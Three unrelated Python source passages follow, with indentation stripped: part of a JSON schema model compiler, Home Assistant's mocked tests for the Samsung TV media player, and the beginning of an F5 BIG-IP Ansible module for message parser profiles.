self.value = None
if 'value' in json and is_allowed_value:
self.value = json['value']
if 'type' not in json:
# Sometimes the type of the value is left out, and we need to figure
# it out for ourselves.
if isinstance(self.value, int):
json['type'] = 'integer'
elif isinstance(self.value, basestring):
json['type'] = 'string'
else:
# TODO(kalman): support more types as necessary.
raise ParseException(
parent,
'"%s" is not a supported type for "value"' % type(self.value))
self.type_ = Type(parent, name, json, namespace, origin)
def GetUnixName(self):
"""Gets the property's unix_name. Raises AttributeError if not set.
"""
if not self._unix_name:
raise AttributeError('No unix_name set on %s' % self.name)
self._unix_name_used = True
return self._unix_name
def SetUnixName(self, unix_name):
"""Set the property's unix_name. Raises AttributeError if the unix_name has
already been used (GetUnixName has been called).
"""
if unix_name == self._unix_name:
return
if self._unix_name_used:
raise AttributeError(
'Cannot set the unix_name on %s; '
'it is already used elsewhere as %s' %
(self.name, self._unix_name))
self._unix_name = unix_name
unix_name = property(GetUnixName, SetUnixName)
class _Enum(object):
"""Superclass for enum types with a "name" field, setting up repr/eq/ne.
Enums need to do this so that equality/non-equality work over pickling.
"""
@staticmethod
def GetAll(cls):
"""Yields all _Enum objects declared in |cls|.
"""
for prop_key in dir(cls):
prop_value = getattr(cls, prop_key)
if isinstance(prop_value, _Enum):
yield prop_value
def __init__(self, name):
self.name = name
def __eq__(self, other):
return type(other) == type(self) and other.name == self.name
def __ne__(self, other):
return not (self == other)
def __repr__(self):
return self.name
def __str__(self):
return repr(self)
class _PropertyTypeInfo(_Enum):
def __init__(self, is_fundamental, name):
_Enum.__init__(self, name)
self.is_fundamental = is_fundamental
class PropertyType(object):
"""Enum of different types of properties/parameters.
"""
ANY = _PropertyTypeInfo(False, "any")
ARRAY = _PropertyTypeInfo(False, "array")
BINARY = _PropertyTypeInfo(False, "binary")
BOOLEAN = _PropertyTypeInfo(True, "boolean")
CHOICES = _PropertyTypeInfo(False, "choices")
DOUBLE = _PropertyTypeInfo(True, "double")
ENUM = _PropertyTypeInfo(False, "enum")
FUNCTION = _PropertyTypeInfo(False, "function")
INT64 = _PropertyTypeInfo(True, "int64")
INTEGER = _PropertyTypeInfo(True, "integer")
OBJECT = _PropertyTypeInfo(False, "object")
REF = _PropertyTypeInfo(False, "ref")
STRING = _PropertyTypeInfo(True, "string")
@memoize
def UnixName(name):
'''Returns the unix_style name for a given lowerCamelCase string.
'''
unix_name = []
for i, c in enumerate(name):
if c.isupper() and i > 0 and name[i - 1] != '_':
# Replace lowerUpper with lower_Upper.
if name[i - 1].islower():
unix_name.append('_')
# Replace ACMEWidgets with ACME_Widgets
elif i + 1 < len(name) and name[i + 1].islower():
unix_name.append('_')
if c == '.':
# Replace hello.world with hello_world.
unix_name.append('_')
else:
# Everything is lowercase.
unix_name.append(c.lower())
return ''.join(unix_name)
def _StripNamespace(name, namespace):
if name.startswith(namespace.name + '.'):
return name[len(namespace.name + '.'):]
return name
def _GetModelHierarchy(entity):
"""Returns the hierarchy of the given model entity."""
hierarchy = []
while entity is not None:
hierarchy.append(getattr(entity, 'name', repr(entity)))
if isinstance(entity, Namespace):
hierarchy.insert(0, ' in %s' % entity.source_file)
entity = getattr(entity, 'parent', None)
hierarchy.reverse()
return hierarchy
def _GetTypes(parent, json, namespace, origin):
"""Creates Type objects extracted from |json|.
"""
types = OrderedDict()
for type_json in json.get('types', []):
type_ = Type(parent, type_json['id'], type_json, namespace, origin)
types[type_.name] = type_
return types
def _GetFunctions(parent, json, namespace):
"""Creates Function objects extracted from |json|.
"""
functions = OrderedDict()
for function_json in json.get('functions', []):
function = Function(parent,
function_json['name'],
function_json,
namespace,
Origin(from_json=True))
functions[function.name] = function
return functions
def _GetEvents(parent, json, namespace):
"""Creates Function objects generated from the events in |json|.
"""
events = OrderedDict()
for event_json in json.get('events', []):
event = Function(parent,
event_json['name'],
event_json,
namespace,
Origin(from_client=True))
events[event.name] = event
return events
def _GetProperties(parent, json, namespace, origin):
"""Generates Property objects extracted from |json|.
"""
properties = OrderedDict()
for name, property_json in json.get('properties', {}).items():
properties[name] = Property(parent, name, property_json, namespace, origin)
return properties
class _PlatformInfo(_Enum):
def __init__(self, name):
_Enum.__init__(self, name)
class Platforms(object):
"""Enum of the possible platforms.
"""
CHROMEOS = _PlatformInfo("chromeos")
CHROMEOS_TOUCH = _PlatformInfo("chromeos_touch")
LINUX = _PlatformInfo("linux")
MAC = _PlatformInfo("mac")
WIN = _PlatformInfo("win")
def _GetPlatforms(json):
if 'platforms' not in json:
return None
platforms = []
for platform_name in json['platforms']:
for platform_enum in _Enum.GetAll(Platforms):
if platform_name == platform_enum.name:
platforms.append(platform_enum)
break
return platforms
| |
"""Tests for samsungtv component."""
import asyncio
from datetime import timedelta
import logging
from asynctest import mock
from asynctest.mock import call, patch
import pytest
from samsungctl import exceptions
from websocket import WebSocketException
from homeassistant.components.media_player import DEVICE_CLASS_TV
from homeassistant.components.media_player.const import (
ATTR_INPUT_SOURCE,
ATTR_MEDIA_CONTENT_ID,
ATTR_MEDIA_CONTENT_TYPE,
ATTR_MEDIA_VOLUME_MUTED,
DOMAIN,
MEDIA_TYPE_CHANNEL,
MEDIA_TYPE_URL,
SERVICE_PLAY_MEDIA,
SERVICE_SELECT_SOURCE,
SUPPORT_TURN_ON,
)
from homeassistant.components.samsungtv.const import (
CONF_ON_ACTION,
DOMAIN as SAMSUNGTV_DOMAIN,
)
from homeassistant.components.samsungtv.media_player import SUPPORT_SAMSUNGTV
from homeassistant.const import (
ATTR_DEVICE_CLASS,
ATTR_ENTITY_ID,
ATTR_FRIENDLY_NAME,
ATTR_SUPPORTED_FEATURES,
CONF_HOST,
CONF_NAME,
CONF_PORT,
SERVICE_MEDIA_NEXT_TRACK,
SERVICE_MEDIA_PAUSE,
SERVICE_MEDIA_PLAY,
SERVICE_MEDIA_PREVIOUS_TRACK,
SERVICE_TURN_OFF,
SERVICE_TURN_ON,
SERVICE_VOLUME_DOWN,
SERVICE_VOLUME_MUTE,
SERVICE_VOLUME_UP,
STATE_OFF,
STATE_ON,
)
from homeassistant.setup import async_setup_component
import homeassistant.util.dt as dt_util
from tests.common import async_fire_time_changed
ENTITY_ID = f"{DOMAIN}.fake"
MOCK_CONFIG = {
SAMSUNGTV_DOMAIN: [
{
CONF_HOST: "fake",
CONF_NAME: "fake",
CONF_PORT: 8001,
CONF_ON_ACTION: [{"delay": "00:00:01"}],
}
]
}
ENTITY_ID_NOTURNON = f"{DOMAIN}.fake_noturnon"
MOCK_CONFIG_NOTURNON = {
SAMSUNGTV_DOMAIN: [
{CONF_HOST: "fake_noturnon", CONF_NAME: "fake_noturnon", CONF_PORT: 55000}
]
}
@pytest.fixture(name="remote")
def remote_fixture():
"""Patch the samsungctl Remote."""
with patch("homeassistant.components.samsungtv.config_flow.Remote"), patch(
"homeassistant.components.samsungtv.config_flow.socket"
) as socket1, patch(
"homeassistant.components.samsungtv.media_player.SamsungRemote"
) as remote_class, patch(
"homeassistant.components.samsungtv.socket"
) as socket2:
remote = mock.Mock()
remote_class.return_value = remote
socket1.gethostbyname.return_value = "FAKE_IP_ADDRESS"
socket2.gethostbyname.return_value = "FAKE_IP_ADDRESS"
yield remote
@pytest.fixture(name="delay")
def delay_fixture():
"""Patch the delay script function."""
with patch(
"homeassistant.components.samsungtv.media_player.Script.async_run"
) as delay:
yield delay
@pytest.fixture
def mock_now():
"""Fixture for dtutil.now."""
return dt_util.utcnow()
async def setup_samsungtv(hass, config):
"""Set up mock Samsung TV."""
await async_setup_component(hass, SAMSUNGTV_DOMAIN, config)
await hass.async_block_till_done()
async def test_setup_with_turnon(hass, remote):
"""Test setup of platform."""
await setup_samsungtv(hass, MOCK_CONFIG)
assert hass.states.get(ENTITY_ID)
async def test_setup_without_turnon(hass, remote):
"""Test setup of platform."""
await setup_samsungtv(hass, MOCK_CONFIG_NOTURNON)
assert hass.states.get(ENTITY_ID_NOTURNON)
async def test_update_on(hass, remote, mock_now):
"""Testing update tv on."""
await setup_samsungtv(hass, MOCK_CONFIG)
next_update = mock_now + timedelta(minutes=5)
with patch("homeassistant.util.dt.utcnow", return_value=next_update):
async_fire_time_changed(hass, next_update)
await hass.async_block_till_done()
state = hass.states.get(ENTITY_ID)
assert state.state == STATE_ON
async def test_update_off(hass, remote, mock_now):
"""Testing update tv off."""
await setup_samsungtv(hass, MOCK_CONFIG)
with patch(
"homeassistant.components.samsungtv.media_player.SamsungRemote",
side_effect=[OSError("Boom"), mock.DEFAULT],
):
next_update = mock_now + timedelta(minutes=5)
with patch("homeassistant.util.dt.utcnow", return_value=next_update):
async_fire_time_changed(hass, next_update)
await hass.async_block_till_done()
state = hass.states.get(ENTITY_ID)
assert state.state == STATE_OFF
async def test_update_access_denied(hass, remote, mock_now):
"""Testing update tv unhandled response exception."""
await setup_samsungtv(hass, MOCK_CONFIG)
with patch(
"homeassistant.components.samsungtv.media_player.SamsungRemote",
side_effect=exceptions.AccessDenied("Boom"),
):
next_update = mock_now + timedelta(minutes=5)
with patch("homeassistant.util.dt.utcnow", return_value=next_update):
async_fire_time_changed(hass, next_update)
await hass.async_block_till_done()
assert [
flow
for flow in hass.config_entries.flow.async_progress()
if flow["context"]["source"] == "reauth"
]
async def test_update_unhandled_response(hass, remote, mock_now):
"""Testing update tv unhandled response exception."""
await setup_samsungtv(hass, MOCK_CONFIG)
with patch(
"homeassistant.components.samsungtv.media_player.SamsungRemote",
side_effect=[exceptions.UnhandledResponse("Boom"), mock.DEFAULT],
):
next_update = mock_now + timedelta(minutes=5)
with patch("homeassistant.util.dt.utcnow", return_value=next_update):
async_fire_time_changed(hass, next_update)
await hass.async_block_till_done()
state = hass.states.get(ENTITY_ID)
assert state.state == STATE_ON
async def test_send_key(hass, remote):
"""Test for send key."""
await setup_samsungtv(hass, MOCK_CONFIG)
assert await hass.services.async_call(
DOMAIN, SERVICE_VOLUME_UP, {ATTR_ENTITY_ID: ENTITY_ID}, True
)
state = hass.states.get(ENTITY_ID)
# key and update called
assert remote.control.call_count == 1
assert remote.control.call_args_list == [call("KEY_VOLUP")]
assert remote.close.call_count == 1
assert remote.close.call_args_list == [call()]
assert state.state == STATE_ON
async def test_send_key_broken_pipe(hass, remote):
"""Testing broken pipe Exception."""
await setup_samsungtv(hass, MOCK_CONFIG)
remote.control = mock.Mock(side_effect=BrokenPipeError("Boom"))
assert await hass.services.async_call(
DOMAIN, SERVICE_VOLUME_UP, {ATTR_ENTITY_ID: ENTITY_ID}, True
)
state = hass.states.get(ENTITY_ID)
assert state.state == STATE_ON
async def test_send_key_connection_closed_retry_succeed(hass, remote):
"""Test retry on connection closed."""
await setup_samsungtv(hass, MOCK_CONFIG)
remote.control = mock.Mock(
side_effect=[exceptions.ConnectionClosed("Boom"), mock.DEFAULT, mock.DEFAULT]
)
assert await hass.services.async_call(
DOMAIN, SERVICE_VOLUME_UP, {ATTR_ENTITY_ID: ENTITY_ID}, True
)
state = hass.states.get(ENTITY_ID)
# key because of retry two times and update called
assert remote.control.call_count == 2
assert remote.control.call_args_list == [
call("KEY_VOLUP"),
call("KEY_VOLUP"),
]
assert remote.close.call_count == 1
assert remote.close.call_args_list == [call()]
assert state.state == STATE_ON
async def test_send_key_unhandled_response(hass, remote):
"""Testing unhandled response exception."""
await setup_samsungtv(hass, MOCK_CONFIG)
remote.control = mock.Mock(side_effect=exceptions.UnhandledResponse("Boom"))
assert await hass.services.async_call(
DOMAIN, SERVICE_VOLUME_UP, {ATTR_ENTITY_ID: ENTITY_ID}, True
)
state = hass.states.get(ENTITY_ID)
assert state.state == STATE_ON
async def test_send_key_websocketexception(hass, remote):
"""Testing unhandled response exception."""
await setup_samsungtv(hass, MOCK_CONFIG)
remote.control = mock.Mock(side_effect=WebSocketException("Boom"))
assert await hass.services.async_call(
DOMAIN, SERVICE_VOLUME_UP, {ATTR_ENTITY_ID: ENTITY_ID}, True
)
state = hass.states.get(ENTITY_ID)
assert state.state == STATE_ON
async def test_send_key_os_error(hass, remote):
"""Testing broken pipe Exception."""
await setup_samsungtv(hass, MOCK_CONFIG)
remote.control = mock.Mock(side_effect=OSError("Boom"))
assert await hass.services.async_call(
DOMAIN, SERVICE_VOLUME_UP, {ATTR_ENTITY_ID: ENTITY_ID}, True
)
state = hass.states.get(ENTITY_ID)
assert state.state == STATE_ON
async def test_name(hass, remote):
"""Test for name property."""
await setup_samsungtv(hass, MOCK_CONFIG)
state = hass.states.get(ENTITY_ID)
assert state.attributes[ATTR_FRIENDLY_NAME] == "fake"
async def test_state_with_turnon(hass, remote, delay):
"""Test for state property."""
await setup_samsungtv(hass, MOCK_CONFIG)
assert await hass.services.async_call(
DOMAIN, SERVICE_TURN_ON, {ATTR_ENTITY_ID: ENTITY_ID}, True
)
state = hass.states.get(ENTITY_ID)
assert state.state == STATE_ON
assert delay.call_count == 1
assert await hass.services.async_call(
DOMAIN, SERVICE_TURN_OFF, {ATTR_ENTITY_ID: ENTITY_ID}, True
)
state = hass.states.get(ENTITY_ID)
assert state.state == STATE_OFF
async def test_state_without_turnon(hass, remote):
"""Test for state property."""
await setup_samsungtv(hass, MOCK_CONFIG_NOTURNON)
assert await hass.services.async_call(
DOMAIN, SERVICE_VOLUME_UP, {ATTR_ENTITY_ID: ENTITY_ID_NOTURNON}, True
)
state = hass.states.get(ENTITY_ID_NOTURNON)
assert state.state == STATE_ON
assert await hass.services.async_call(
DOMAIN, SERVICE_TURN_OFF, {ATTR_ENTITY_ID: ENTITY_ID_NOTURNON}, True
)
state = hass.states.get(ENTITY_ID_NOTURNON)
assert state.state == STATE_OFF
async def test_supported_features_with_turnon(hass, remote):
"""Test for supported_features property."""
await setup_samsungtv(hass, MOCK_CONFIG)
state = hass.states.get(ENTITY_ID)
assert (
state.attributes[ATTR_SUPPORTED_FEATURES] == SUPPORT_SAMSUNGTV | SUPPORT_TURN_ON
)
async def test_supported_features_without_turnon(hass, remote):
"""Test for supported_features property."""
await setup_samsungtv(hass, MOCK_CONFIG_NOTURNON)
state = hass.states.get(ENTITY_ID_NOTURNON)
assert state.attributes[ATTR_SUPPORTED_FEATURES] == SUPPORT_SAMSUNGTV
async def test_device_class(hass, remote):
"""Test for device_class property."""
await setup_samsungtv(hass, MOCK_CONFIG)
state = hass.states.get(ENTITY_ID)
assert state.attributes[ATTR_DEVICE_CLASS] == DEVICE_CLASS_TV
async def test_turn_off_websocket(hass, remote):
"""Test for turn_off."""
await setup_samsungtv(hass, MOCK_CONFIG)
assert await hass.services.async_call(
DOMAIN, SERVICE_TURN_OFF, {ATTR_ENTITY_ID: ENTITY_ID}, True
)
# key called
assert remote.control.call_count == 1
assert remote.control.call_args_list == [call("KEY_POWER")]
async def test_turn_off_legacy(hass):
"""Test for turn_off."""
with patch("homeassistant.components.samsungtv.config_flow.socket"), patch(
"homeassistant.components.samsungtv.config_flow.Remote",
side_effect=[OSError("Boom"), mock.DEFAULT],
), patch(
"homeassistant.components.samsungtv.media_player.SamsungRemote"
) as remote_class, patch(
"homeassistant.components.samsungtv.socket"
):
remote = mock.Mock()
remote_class.return_value = remote
await setup_samsungtv(hass, MOCK_CONFIG_NOTURNON)
assert await hass.services.async_call(
DOMAIN, SERVICE_TURN_OFF, {ATTR_ENTITY_ID: ENTITY_ID_NOTURNON}, True
)
# key called
assert remote.control.call_count == 1
assert remote.control.call_args_list == [call("KEY_POWEROFF")]
async def test_turn_off_os_error(hass, remote, caplog):
"""Test for turn_off with OSError."""
caplog.set_level(logging.DEBUG)
await setup_samsungtv(hass, MOCK_CONFIG)
remote.close = mock.Mock(side_effect=OSError("BOOM"))
assert await hass.services.async_call(
DOMAIN, SERVICE_TURN_OFF, {ATTR_ENTITY_ID: ENTITY_ID}, True
)
assert "Could not establish connection." in caplog.text
async def test_volume_up(hass, remote):
"""Test for volume_up."""
await setup_samsungtv(hass, MOCK_CONFIG)
assert await hass.services.async_call(
DOMAIN, SERVICE_VOLUME_UP, {ATTR_ENTITY_ID: ENTITY_ID}, True
)
# key and update called
assert remote.control.call_count == 1
assert remote.control.call_args_list == [call("KEY_VOLUP")]
assert remote.close.call_count == 1
assert remote.close.call_args_list == [call()]
async def test_volume_down(hass, remote):
"""Test for volume_down."""
await setup_samsungtv(hass, MOCK_CONFIG)
assert await hass.services.async_call(
DOMAIN, SERVICE_VOLUME_DOWN, {ATTR_ENTITY_ID: ENTITY_ID}, True
)
# key and update called
assert remote.control.call_count == 1
assert remote.control.call_args_list == [call("KEY_VOLDOWN")]
assert remote.close.call_count == 1
assert remote.close.call_args_list == [call()]
async def test_mute_volume(hass, remote):
"""Test for mute_volume."""
await setup_samsungtv(hass, MOCK_CONFIG)
assert await hass.services.async_call(
DOMAIN,
SERVICE_VOLUME_MUTE,
{ATTR_ENTITY_ID: ENTITY_ID, ATTR_MEDIA_VOLUME_MUTED: True},
True,
)
# key and update called
assert remote.control.call_count == 1
assert remote.control.call_args_list == [call("KEY_MUTE")]
assert remote.close.call_count == 1
assert remote.close.call_args_list == [call()]
async def test_media_play(hass, remote):
"""Test for media_play."""
await setup_samsungtv(hass, MOCK_CONFIG)
assert await hass.services.async_call(
DOMAIN, SERVICE_MEDIA_PLAY, {ATTR_ENTITY_ID: ENTITY_ID}, True
)
# key and update called
assert remote.control.call_count == 1
assert remote.control.call_args_list == [call("KEY_PLAY")]
assert remote.close.call_count == 1
assert remote.close.call_args_list == [call()]
async def test_media_pause(hass, remote):
"""Test for media_pause."""
await setup_samsungtv(hass, MOCK_CONFIG)
assert await hass.services.async_call(
DOMAIN, SERVICE_MEDIA_PAUSE, {ATTR_ENTITY_ID: ENTITY_ID}, True
)
# key and update called
assert remote.control.call_count == 1
assert remote.control.call_args_list == [call("KEY_PAUSE")]
assert remote.close.call_count == 1
assert remote.close.call_args_list == [call()]
async def test_media_next_track(hass, remote):
"""Test for media_next_track."""
await setup_samsungtv(hass, MOCK_CONFIG)
assert await hass.services.async_call(
DOMAIN, SERVICE_MEDIA_NEXT_TRACK, {ATTR_ENTITY_ID: ENTITY_ID}, True
)
# key and update called
assert remote.control.call_count == 1
assert remote.control.call_args_list == [call("KEY_CHUP")]
assert remote.close.call_count == 1
assert remote.close.call_args_list == [call()]
async def test_media_previous_track(hass, remote):
"""Test for media_previous_track."""
await setup_samsungtv(hass, MOCK_CONFIG)
assert await hass.services.async_call(
DOMAIN, SERVICE_MEDIA_PREVIOUS_TRACK, {ATTR_ENTITY_ID: ENTITY_ID}, True
)
# key and update called
assert remote.control.call_count == 1
assert remote.control.call_args_list == [call("KEY_CHDOWN")]
assert remote.close.call_count == 1
assert remote.close.call_args_list == [call()]
async def test_turn_on_with_turnon(hass, remote, delay):
"""Test turn on."""
await setup_samsungtv(hass, MOCK_CONFIG)
assert await hass.services.async_call(
DOMAIN, SERVICE_TURN_ON, {ATTR_ENTITY_ID: ENTITY_ID}, True
)
assert delay.call_count == 1
async def test_turn_on_without_turnon(hass, remote):
"""Test turn on."""
await setup_samsungtv(hass, MOCK_CONFIG_NOTURNON)
assert await hass.services.async_call(
DOMAIN, SERVICE_TURN_ON, {ATTR_ENTITY_ID: ENTITY_ID_NOTURNON}, True
)
# nothing called as not supported feature
assert remote.control.call_count == 0
async def test_play_media(hass, remote):
"""Test for play_media."""
asyncio_sleep = asyncio.sleep
sleeps = []
async def sleep(duration, loop):
sleeps.append(duration)
await asyncio_sleep(0, loop=loop)
await setup_samsungtv(hass, MOCK_CONFIG)
with patch("asyncio.sleep", new=sleep):
assert await hass.services.async_call(
DOMAIN,
SERVICE_PLAY_MEDIA,
{
ATTR_ENTITY_ID: ENTITY_ID,
ATTR_MEDIA_CONTENT_TYPE: MEDIA_TYPE_CHANNEL,
ATTR_MEDIA_CONTENT_ID: "576",
},
True,
)
# keys and update called
assert remote.control.call_count == 4
assert remote.control.call_args_list == [
call("KEY_5"),
call("KEY_7"),
call("KEY_6"),
call("KEY_ENTER"),
]
assert remote.close.call_count == 1
assert remote.close.call_args_list == [call()]
assert len(sleeps) == 3
async def test_play_media_invalid_type(hass, remote):
"""Test for play_media with invalid media type."""
with patch(
"homeassistant.components.samsungtv.media_player.SamsungRemote"
) as remote, patch("homeassistant.components.samsungtv.config_flow.socket"):
url = "https://example.com"
await setup_samsungtv(hass, MOCK_CONFIG)
assert await hass.services.async_call(
DOMAIN,
SERVICE_PLAY_MEDIA,
{
ATTR_ENTITY_ID: ENTITY_ID,
ATTR_MEDIA_CONTENT_TYPE: MEDIA_TYPE_URL,
ATTR_MEDIA_CONTENT_ID: url,
},
True,
)
# only update called
assert remote.control.call_count == 0
assert remote.close.call_count == 0
assert remote.call_count == 1
async def test_play_media_channel_as_string(hass, remote):
"""Test for play_media with invalid channel as string."""
with patch(
"homeassistant.components.samsungtv.media_player.SamsungRemote"
) as remote, patch("homeassistant.components.samsungtv.config_flow.socket"):
url = "https://example.com"
await setup_samsungtv(hass, MOCK_CONFIG)
assert await hass.services.async_call(
DOMAIN,
SERVICE_PLAY_MEDIA,
{
ATTR_ENTITY_ID: ENTITY_ID,
ATTR_MEDIA_CONTENT_TYPE: MEDIA_TYPE_CHANNEL,
ATTR_MEDIA_CONTENT_ID: url,
},
True,
)
# only update called
assert remote.control.call_count == 0
assert remote.close.call_count == 0
assert remote.call_count == 1
async def test_play_media_channel_as_non_positive(hass, remote):
"""Test for play_media with invalid channel as non positive integer."""
with patch(
"homeassistant.components.samsungtv.media_player.SamsungRemote"
) as remote, patch("homeassistant.components.samsungtv.config_flow.socket"):
await setup_samsungtv(hass, MOCK_CONFIG)
assert await hass.services.async_call(
DOMAIN,
SERVICE_PLAY_MEDIA,
{
ATTR_ENTITY_ID: ENTITY_ID,
ATTR_MEDIA_CONTENT_TYPE: MEDIA_TYPE_CHANNEL,
ATTR_MEDIA_CONTENT_ID: "-4",
},
True,
)
# only update called
assert remote.control.call_count == 0
assert remote.close.call_count == 0
assert remote.call_count == 1
async def test_select_source(hass, remote):
"""Test for select_source."""
await setup_samsungtv(hass, MOCK_CONFIG)
assert await hass.services.async_call(
DOMAIN,
SERVICE_SELECT_SOURCE,
{ATTR_ENTITY_ID: ENTITY_ID, ATTR_INPUT_SOURCE: "HDMI"},
True,
)
# key and update called
assert remote.control.call_count == 1
assert remote.control.call_args_list == [call("KEY_HDMI")]
assert remote.close.call_count == 1
assert remote.close.call_args_list == [call()]
async def test_select_source_invalid_source(hass, remote):
"""Test for select_source with invalid source."""
with patch(
"homeassistant.components.samsungtv.media_player.SamsungRemote"
) as remote, patch("homeassistant.components.samsungtv.config_flow.socket"):
await setup_samsungtv(hass, MOCK_CONFIG)
assert await hass.services.async_call(
DOMAIN,
SERVICE_SELECT_SOURCE,
{ATTR_ENTITY_ID: ENTITY_ID, ATTR_INPUT_SOURCE: "INVALID"},
True,
)
# only update called
assert remote.control.call_count == 0
assert remote.close.call_count == 0
assert remote.call_count == 1
| |
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright: (c) 2019, F5 Networks Inc.
# GNU General Public License v3.0 (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'certified'}
DOCUMENTATION = r'''
---
module: bigip_message_routing_protocol
short_description: Manage generic message parser profile.
description:
- Manages generic message parser profile for use with the message routing framework.
version_added: 2.9
options:
name:
description:
- Specifies the name of the generic parser profile.
required: True
type: str
description:
description:
- The user defined description of the generic parser profile.
type: str
parent:
description:
- The parent template of this parser profile. Once this value has been set, it cannot be changed.
- When creating a new profile, if this parameter is not specified,
the default is the system-supplied C(genericmsg) profile.
type: str
disable_parser:
description:
- When C(yes), the generic message parser will be disabled ignoring all incoming packets and not directly
send message data.
- This mode supports iRule script protocol implementations that will generate messages from the incoming transport
stream and send outgoing messages on the outgoing transport stream.
type: bool
max_egress_buffer:
description:
- Specifies the maximum size of the send buffer in bytes. If the number of bytes in the send buffer for a
connection exceeds this value, the generic message protocol will stop receiving outgoing messages from the
router until the size of the size of the buffer drops below this setting.
- The accepted range is between 0 and 4294967295 inclusive.
type: int
max_msg_size:
description:
- Specifies the maximum size of a received message. If a message exceeds this size, the connection will be reset.
- The accepted range is between 0 and 4294967295 inclusive.
type: int
msg_terminator:
description:
- The string of characters used to terminate a message. If the message-terminator is not specified,
the generic message parser will not separate the input stream into messages.
type: str
no_response:
description:
- When set, matching of responses to requests is disabled.
type: bool
partition:
description:
- Device partition to create route object on.
type: str
default: Common
state:
description:
- When C(present), ensures that the route exists.
- When C(absent), ensures the route is removed.
type: str
choices:
- present
- absent
default: present
notes:
- Requires BIG-IP >= 14.0.0
extends_documentation_fragment: f5
author:
- Wojciech Wypior (@wojtek0806)
'''
EXAMPLES = r'''
- name: Create a generic parser
bigip_message_routing_protocol:
name: foo
description: 'This is parser'
no_response: yes
provider:
password: secret
server: lb.mydomain.com
user: admin
delegate_to: localhost
- name: Modify a generic parser
bigip_message_routing_protocol:
name: foo
no_response: no
max_egress_buffer: 10000
max_msg_size: 2000
provider:
password: secret
server: lb.mydomain.com
user: admin
delegate_to: localhost
- name: Remove generic parser
bigip_message_routing_protocol:
name: foo
state: absent
provider:
password: secret
server: lb.mydomain.com
user: admin
delegate_to: localhost
'''
RETURN = r'''
description:
description: The user defined description of the parser profile.
returned: changed
type: str
sample: My description
parent:
description: The parent template of this parser profile.
returned: changed
type: str
sample: /Common/genericmsg
disable_parser:
description: Disables generic message parser.
returned: changed
type: bool
sample: yes
max_egress_buffer:
description: The maximum size of the send buffer in bytes.
returned: changed
type: int
sample: 10000
max_msg_size:
description: The maximum size of a received message.
returned: changed
type: int
sample: 4000
msg_terminator:
description: The string of characters used to terminate a message.
returned: changed
type: str
sample: '%%%%'
no_response:
description: Disables matching of responses to requests.
returned: changed
type: bool
sample: yes
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.basic import env_fallback
from distutils.version import LooseVersion
try:
from library.module_utils.network.f5.bigip import F5RestClient
from library.module_utils.network.f5.common import F5ModuleError
from library.module_utils.network.f5.common import AnsibleF5Parameters
from library.module_utils.network.f5.common import fq_name
from library.module_utils.network.f5.common import transform_name
from library.module_utils.network.f5.common import f5_argument_spec
from library.module_utils.network.f5.common import flatten_boolean
from library.module_utils.network.f5.compare import cmp_str_with_none
from library.module_utils.network.f5.icontrol import tmos_version
except ImportError:
from ansible.module_utils.network.f5.bigip import F5RestClient
from ansible.module_utils.network.f5.common import F5ModuleError
from ansible.module_utils.network.f5.common import AnsibleF5Parameters
from ansible.module_utils.network.f5.common import fq_name
from ansible.module_utils.network.f5.common import transform_name
from ansible.module_utils.network.f5.common import f5_argument_spec
from ansible.module_utils.network.f5.common import flatten_boolean
from ansible.module_utils.network.f5.compare import cmp_str_with_none
from ansible.module_utils.network.f5.icontrol import tmos_version
class Parameters(AnsibleF5Parameters):
api_map = {
'defaultsFrom': 'parent',
'disableParser': 'disable_parser',
'maxEgressBuffer': 'max_egress_buffer',
'maxMessageSize': 'max_msg_size',
'messageTerminator': 'msg_terminator',
'noResponse': 'no_response',
}
api_attributes = [
'description',
'defaultsFrom',
'disableParser',
'maxEgressBuffer',
'maxMessageSize',
'messageTerminator',
'noResponse',
]
returnables = [
'description',
'parent',
'disable_parser',
'max_egress_buffer',
'max_msg_size',
'msg_terminator',
'no_response',
]
updatables = [
'description',
'parent',
'disable_parser',
'max_egress_buffer',
'max_msg_size',
'msg_terminator',
'no_response',
]
@property
def no_response(self):
return flatten_boolean(self._values['no_response'])
@property
def disable_parser(self):
return flatten_boolean(self._values['disable_parser'])
class ApiParameters(Parameters):
pass
class ModuleParameters(Parameters):
@property
def parent(self):
if self._values['parent'] is None:
return None
result = fq_name(self.partition, self._values['parent'])
return result
@property
def max_msg_size(self):
if self._values['max_msg_size'] is None:
return None
if 0 <= self._values['max_msg_size'] <= 4294967295:
return self._values['max_msg_size']
raise F5ModuleError(
"Valid 'max_msg_size' must be in range 0 - 4294967295."
)
@property
def max_egress_buffer(self):
if self._values['max_egress_buffer'] is None:
return None
if 0 <= self._values['max_egress_buffer'] <= 4294967295:
return self._values['max_egress_buffer']
raise F5ModuleError(
"Valid 'max_egress_buffer' must be in range 0 - 4294967295."
)
class Changes(Parameters):
def to_return(self):
result = {}
try:
for returnable in self.returnables:
result[returnable] = getattr(self, returnable)
result = self._filter_params(result)
except Exception:
pass
return result
class UsableChanges(Changes):
pass
class ReportableChanges(Changes):
pass
class Difference(object):
def __init__(self, want, have=None):
self.want = want
self.have = have
def compare(self, param):
try:
result = getattr(self, param)
return result
except AttributeError:
return self.__default(param)
def __default(self, param):
attr1 = getattr(self.want, param)
try:
attr2 = getattr(self.have, param)
if attr1 != attr2:
return attr1
except AttributeError:
return attr1
@property
def parent(self):
if self.want.parent is None:
return None
if self.want.parent != self.have.parent:
raise F5ModuleError(
"The parent router profile cannot be changed."
)
@property
def description(self):
return cmp_str_with_none(self.want.description, self.have.description)
@property
def msg_terminator(self):
return cmp_str_with_none(self.want.msg_terminator, self.have.msg_terminator)
class ModuleManager(object):
def __init__(self, *args, **kwargs):
self.module = kwargs.get('module', None)
self.client = F5RestClient(**self.module.params)
self.want = ModuleParameters(params=self.module.params)
self.have = ApiParameters()
self.changes = UsableChanges()
def _set_changed_options(self):
changed = {}
for key in Parameters.returnables:
if getattr(self.want, key) is not None:
changed[key] = getattr(self.want, key)
if changed:
self.changes = UsableChanges(params=changed)
def _update_changed_options(self):
diff = Difference(self.want, self.have)
updatables = Parameters.updatables
changed = dict()
for k in updatables:
change = diff.compare(k)
if change is None:
continue
else:
if isinstance(change, dict):
changed.update(change)
else:
changed[k] = change
if changed:
self.changes = UsableChanges(params=changed)
return True
return False
def _announce_deprecations(self, result):
warnings = result.pop('__warnings', [])
for warning in warnings:
